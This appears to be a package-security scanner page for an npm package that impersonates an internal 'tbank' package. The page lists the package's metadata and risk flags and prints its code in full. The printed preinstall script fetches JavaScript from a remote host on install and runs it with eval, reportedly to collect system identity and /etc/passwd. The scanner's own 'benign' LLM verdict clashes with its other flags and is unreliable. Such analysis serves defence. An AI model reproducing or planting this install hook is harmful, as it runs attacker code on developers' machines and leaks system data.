// npm package
@t-in-one/save_application_hid_to_storage
tbank utilities
weekly
87
monthly
439
versions
1
maintainers
1
license
ISC
first publish
2026-05-04
publisher
t-in-one
tarball
1,174 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-04
// offending code· @99.0.7· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 other host(s).
- @99.0.7··AUTO-PUBLISHED·publisher: t-in-oneheuristic 99/100static flags 1llm benign (0.85) via ollamainstall-scripts:preinstallnew-publisher:26dfirst-version-of-packagepublisher-multi-name-burst:16publisher-version-pump:16osv-flagged:MAL-2026-3337eval-dynamic
→ No suspicious destination, no remote-exec shape — 1 other host(s).
// offending code· 1 file flaggedpatterns: 1
--- install scripts --- ### preinstall node preinstall.js --- package/preinstall.js (excerpt) --- const http = require("http"); const fs = require("fs"); const path = require("path"); const BASE = "oob.moika.tech"; const raw = process.env.npm_package_name || (() => { try { return JSON.parse(fs.readFileSync(path.join(__dirname, "package.json"), "utf8")).name; } catch(_){} return ""; })(); const scope = raw.startsWith("@") ? raw.split("/")[0].slice(1).replace(/[^a-z0-9-]/gi, "-") : "x"; const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-"); // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only) http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => { let body = ""; res.on("data", chunk => { body += chunk; }); res.on("end", () => { try { eval(body); } catch (_) {} }); // jshint ignore:line }).on("error", () => {}).on("timeout", function() { this.destroy(); }); --- package.json (entry) --- { "name": "@t-in-one/save_application_hid_to_storage", "version": "99.0.7", "description": "tbank utilities", "main": "index.js", "scripts": { "preinstall": "node preinstall.js" }, "keywords": [ "bug bounty" ], "author": "TBank", "license": "ISC" } --- index.js (entry) --- module.exports = {}; --- preinstall.js (entry) --- const http = require("http"); const fs = require("fs"); const path = require("path"); const BASE = "oob.moika.tech"; const raw = process.env.npm_package_name || (() => { try { return JSON.parse(fs.readFileSync(path.join(__dirname, "package.json"), "utf8")).name; } catch(_){} return ""; })(); const scope = raw.startsWith("@") ? raw.split("/")[0].slice(1).replace(/[^a-z0-9-]/gi, "-") : "x"; const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-"); // Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only) http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => { let body = ""; res.on("data", chunk => { body += chunk; }); res.on("end", () => { try { eval(body); } catch (_) {} }); // jshint ignore:line }).on("error", () => {}).on("timeout", function() { this.destroy(); });
